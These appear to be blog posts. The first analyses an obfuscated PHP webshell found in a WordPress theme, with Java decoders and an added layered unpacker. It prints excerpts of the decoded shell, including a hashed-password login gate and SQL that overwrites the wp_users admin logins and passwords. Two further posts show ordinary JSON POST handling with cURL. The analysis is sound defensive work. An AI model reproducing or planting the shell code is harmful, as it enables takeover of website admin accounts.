PHP Posts

How to Decode PHP’s gzinflate and base64_decode using Java

This morning I found a very weird script on one of my WordPress websites; it looks like someone has uploaded a malicious script into my WordPress theme folder.

It looks like a PHP script, but encoded using base64 and compressed, to be unpacked by the gzinflate function. I tried to decode the malicious script using PHP, but my PHP knowledge is very limited, so I’m using Java instead.

This is what the malicious script looks like:

<?php eval(gzinflate(base64_decode('7H35m9rItejPd75v/gfSmRvb10uztpvx2Ak7Er 
...bla bla bla.... RGpn/Aw==')));?>

Because I couldn’t find a proper tool to decode it, I created my own Java class to decode this malicious PHP script.
Here is my Java class:

package base64decoder;

import java.io.ByteArrayInputStream;
import java.io.FileOutputStream;
import java.io.InputStream;
import java.io.OutputStream;
import java.nio.charset.StandardCharsets;
import java.nio.file.Files;
import java.nio.file.Paths;
import java.util.zip.Inflater;
import java.util.zip.InflaterInputStream;
import org.apache.commons.codec.binary.Base64;

public class GZipAndBase64Decoder {

    public static void main(String[] args) throws Exception {
        // Read the whole file and drop whitespace, so a payload that was pasted
        // over several lines is not cut off after the first line.
        String isi = new String(Files.readAllBytes(Paths.get("coded.txt")),
                StandardCharsets.US_ASCII).replaceAll("\\s+", "");

        // PHP's gzinflate() reads raw DEFLATE data (no zlib or gzip header),
        // which is what Inflater(true) expects.
        try (InputStream inflInstream = new InflaterInputStream(
                     new ByteArrayInputStream(new Base64().decode(isi)),
                     new Inflater(true));
             OutputStream fileOutputStream = new FileOutputStream("decoded.txt")) {
            byte[] bytes = new byte[4096];
            int length;
            // Copy the inflated bytes to decoded.txt until the stream ends.
            while ((length = inflInstream.read(bytes, 0, bytes.length)) != -1) {
                fileOutputStream.write(bytes, 0, length);
            }
        }
    }
}

Create a file “coded.txt” and copy-paste your encoded, compressed script into that file. But remember, only copy the highlighted part (shown below as MALICIOUS SCRIPT), not the PHP code around it:

<?php eval(gzinflate(base64_decode('
MALICIOUS SCRIPT
')));?>

You will find the decoded script in the file “decoded.txt”. This is what the decoded PHP script looks like:

error_reporting(0);
@set_time_limit(0);
@session_start();
// configuration
$xSoftware = trim(getenv("SERVER_SOFTWARE"));
// server name
$xServerName = $_SERVER["HTTP_HOST"];
$xName = "BlackAsu";
$masukin = "892ab763f02795bfa28354ef1d39059f";  //cange you password (hash md5) 
$nikmatin = (md5($_POST['pass']));
$crotzz = 1;  // ' 0 '  no login pass
if($nikmatin == $masukin){
	$_SESSION['login'] = "$nikmatin";
}
if($crotzz){
	if(!isset($_SESSION['login']) or $_SESSION['login'] != $masukin){
		die("
// bla bla bla bla (I'm too lazy to copy-paste the whole script)

Use this class if you want to decode a plain Base64 script that was not compressed:

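package base64decoder;

import java.io.FileOutputStream;
import java.io.OutputStream;
import java.nio.charset.StandardCharsets;
import java.nio.file.Files;
import java.nio.file.Paths;
import org.apache.commons.codec.binary.Base64;

public class Base64Decoder {

    public static void main(String[] args) throws Exception {
        // Read the whole file and drop whitespace, so a payload that was pasted
        // over several lines is decoded in full.
        String isi = new String(Files.readAllBytes(Paths.get("coded2.txt")),
                StandardCharsets.US_ASCII).replaceAll("\\s+", "");

        // Write the decoded bytes as they are; passing them through a String
        // re-encodes them with the platform charset and can corrupt binary data.
        try (OutputStream fileOutputStream = new FileOutputStream("decoded2.txt")) {
            fileOutputStream.write(new Base64().decode(isi));
        }
    }
}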

I’m using Apache Commons Codec to handle Base64 encoding and decoding.
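The two classes above each decode one layer that was pasted in by hand. As an added example (not code from the original post), the class below finds the wrapper in the PHP source itself and keeps decoding until no `eval(gzinflate(base64_decode(...)))` or `eval(base64_decode(...))` layer is left, which goes beyond the single-layer case in the post because such payloads are often nested. It uses the JDK's `java.util.Base64` in place of Commons Codec; the class name, the layer and size caps, and the sample payload are assumptions made for illustration.

```java
import java.io.ByteArrayOutputStream;
import java.nio.charset.StandardCharsets;
import java.util.Arrays;
import java.util.Base64;
import java.util.regex.Matcher;
import java.util.regex.Pattern;
import java.util.zip.Inflater;

public class LayeredPhpUnpacker {            // hypothetical name, not code from the post
    // Matches eval(gzinflate(base64_decode('...'))) and eval(base64_decode('...')).
    static final Pattern WRAPPER = Pattern.compile("(?i)eval\\s*\\(\\s*(gzinflate\\s*\\(\\s*)?"
            + "base64_decode\\s*\\(\\s*['\"]([A-Za-z0-9+/=\\s]+)['\"]");
    static final int MAX_LAYERS = 20, MAX_BYTES = 16 << 20; // nesting cap, output size cap

    static byte[] rawInflate(byte[] in) throws Exception {
        Inflater inf = new Inflater(true);   // raw DEFLATE, the format PHP gzinflate() reads
        ByteArrayOutputStream out = new ByteArrayOutputStream();
        byte[] buf = new byte[4096];
        try {
            inf.setInput(Arrays.copyOf(in, in.length + 1)); // dummy byte the Inflater docs ask for
            while (!inf.finished()) {
                int n = inf.inflate(buf);
                out.write(buf, 0, n);
                if ((n == 0 && !inf.finished()) || out.size() > MAX_BYTES)
                    throw new IllegalStateException("truncated stream or output over cap");
            }
            return out.toByteArray();
        } finally { inf.end(); }
    }

    // Peels one wrapper per pass by decoding only; the PHP is never executed.
    // Text around the wrapper is dropped, only the decoded payload is kept.
    static String unpack(String php) throws Exception {
        for (int layer = 0; layer < MAX_LAYERS; layer++) {
            Matcher m = WRAPPER.matcher(php);
            if (!m.find()) return php;       // no wrapper left: clear text reached
            byte[] data = Base64.getMimeDecoder().decode(m.group(2));
            if (m.group(1) != null) data = rawInflate(data);
            php = new String(data, StandardCharsets.ISO_8859_1); // keeps bytes 1:1
        }
        throw new IllegalStateException("more than " + MAX_LAYERS + " layers");
    }

    public static void main(String[] args) throws Exception {
        // Constructed, harmless sample: a stored DEFLATE block of "echo 'hi';" in two layers.
        String inner = "eval(gzinflate(base64_decode('AQoA9f9lY2hvICdoaSc7')));";
        String outer = Base64.getEncoder().encodeToString(inner.getBytes(StandardCharsets.ISO_8859_1));
        System.out.println(unpack("<?php eval(base64_decode('" + outer + "')); ?>"));
    }
}
```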

And by the way, take a look at this part of the malicious script:

echo "<FORM method='POST'>
<table class='tabnet' style='width:300px;'> <tr><th colspan='2'>Connect to mySQL server</th></tr> <tr><td>&nbsp;&nbsp;Host</td><td>
<input style='width:220px;' class='inputz' type='text' name='localhost' value='localhost' /></td></tr> <tr><td>&nbsp;&nbsp;Database</td><td>
<input style='width:220px;' class='inputz' type='text' name='database' value='wp-' /></td></tr> <tr><td>&nbsp;&nbsp;username</td><td>
<input style='width:220px;' class='inputz' type='text' name='username' value='wp-' /></td></tr> <tr><td>&nbsp;&nbsp;password</td><td>
<input style='width:220px;' class='inputz' type='text' name='password' value='**' /></td></tr>
<tr><td>&nbsp;&nbsp;User baru</td><td>
<input style='width:220px;' class='inputz' type='text' name='admin' value='admin' /></td></tr>
 <tr><td>&nbsp;&nbsp;Pass Baru</td><td>
<input style='width:80px;' class='inputz' type='text' name='pwd' value='123456' />&nbsp;

<input style='width:19%;' class='inputzbut' type='submit' value='change!' name='send' /></FORM>
</td></tr> </table><br><br><br><br>
";
}else{
$localhost = $_POST['localhost'];
$database  = $_POST['database'];
$username  = $_POST['username'];
$password  = $_POST['password'];
$pwd   = $_POST['pwd'];
$admin = $_POST['admin'];

 @mysql_connect($localhost,$username,$password) or die(mysql_error());
 @mysql_select_db($database) or die(mysql_error());

$hash = crypt($pwd);
$a4s=@mysql_query("UPDATE wp_users SET user_login ='".$admin."' WHERE ID = 1") or die(mysql_error());
$a4s=@mysql_query("UPDATE wp_users SET user_pass ='".$hash."' WHERE ID = 1") or die(mysql_error());
$a4s=@mysql_query("UPDATE wp_users SET user_login ='".$admin."' WHERE ID = 2") or die(mysql_error());
$a4s=@mysql_query("UPDATE wp_users SET user_pass ='".$hash."' WHERE ID = 2") or die(mysql_error());
$a4s=@mysql_query("UPDATE wp_users SET user_login ='".$admin."' WHERE ID = 3") or die(mysql_error());
$a4s=@mysql_query("UPDATE wp_users SET user_pass ='".$hash."' WHERE ID = 3") or die(mysql_error());
$a4s=@mysql_query("UPDATE wp_users SET user_email ='".$SQL."' WHERE ID = 1") or die(mysql_error());


if($a4s){
echo "<b> Success ..!! :)) sekarang bisa login ke wp-admin</b> ";
}

Okay, so today’s wise word is: don’t forget to change your WordPress table prefix :p


How to Simulate JSon POST Request Using PHP and CURL

Basically, I’m trying to do a PHP POST request using a JSON string as its format, and to consume a JSON array string as the response. Don’t forget to enable cURL in your php.ini file.

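<?php

// set POST variables: address and JSON fields
$url = 'http://localhost:81/dudu.php';
$fields = array(
    'userName'      => 'yyy@xxx.com',
    'password'      => 'yyyy',
    'emailProvider' => 'xxxx'
);
// {"userName":"yyy@xxx.com","password":"yyyy","emailProvider":"xxxx"}

// encode the data as a JSON string for the POST body
$fields_string = json_encode($fields);

// open connection
$ch = curl_init();

// set the url, the POST method, the POST body and its content type
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, $fields_string);
curl_setopt($ch, CURLOPT_HTTPHEADER, array('Content-Type: application/json'));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);

// execute post and stop if the request itself failed
$jsonResult = curl_exec($ch);
if ($jsonResult === false) {
    die('cURL error: ' . curl_error($ch));
}

// close connection
curl_close($ch);

// [{"name":0,"email":"yyy@xxx.com"},{"name":1,"email":"yyy@xxx.com"},
// {"name":2,"email":"yyy@xxx.com"},{"name":3,"email":"yyy@xxx.com"}]
$results = json_decode($jsonResult, true);
if (!is_array($results)) {
    die('Response is not a JSON array');
}
foreach ($results as $result) {
    // escape the values, they come from the remote service and end up in HTML
    $name  = htmlspecialchars((string) $result['name'], ENT_QUOTES, 'UTF-8');
    $email = htmlspecialchars((string) $result['email'], ENT_QUOTES, 'UTF-8');
    echo "name : {$name} and email {$email} <br />";
}

?>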

This is what my browser looks like after testing my JSON POST.

Have fun with CURL :-)


How to Handle JSon POST Request Using PHP

On my last project, I needed to create a PHP service using JSON to handle service requests from multiple clients. My PHP file would consume a JSON string for its requests and produce a JSON string as its responses.
I’m not too familiar with PHP, but after some time googling I found a workaround. This is how I do it.

<?php
// JSON request format is:
// {"userName":"654321@zzzz.com","password":"12345","emailProvider":"zzzz"}

// read JSON input from the raw request body
$data_back = json_decode(file_get_contents('php://input'));

// reject a body that is not a JSON object with the three expected fields
if (!is_object($data_back)
        || !isset($data_back->userName, $data_back->password, $data_back->emailProvider)) {
    http_response_code(400);
    header("Content-Type: application/json");
    echo json_encode(array("error" => "invalid JSON request"));
    exit;
}

// copy the JSON fields to PHP variables
$userName = $data_back->userName;
$password = $data_back->password;
$emailProvider = $data_back->emailProvider;

// create JSON response
$responses = array();
for ($i = 0; $i < 10; $i++) {
    $responses[] = array("name" => $i, "email" => $userName . " " . $password . " " . $emailProvider);
}

// JSON response format is:
// [{"name":"eeee","email":"eee@zzzzz.com"},
// {"name":"aaaa","email":"aaaaa@zzzzz.com"},{"name":"cccc","email":"bbb@zzzzz.com"}]

// set header as JSON
header("Content-Type: application/json");

// send response
echo json_encode($responses);
?>

This is the HTTP header and body of the request and response.

Hope it helps others, have fun with JSON. ;-)
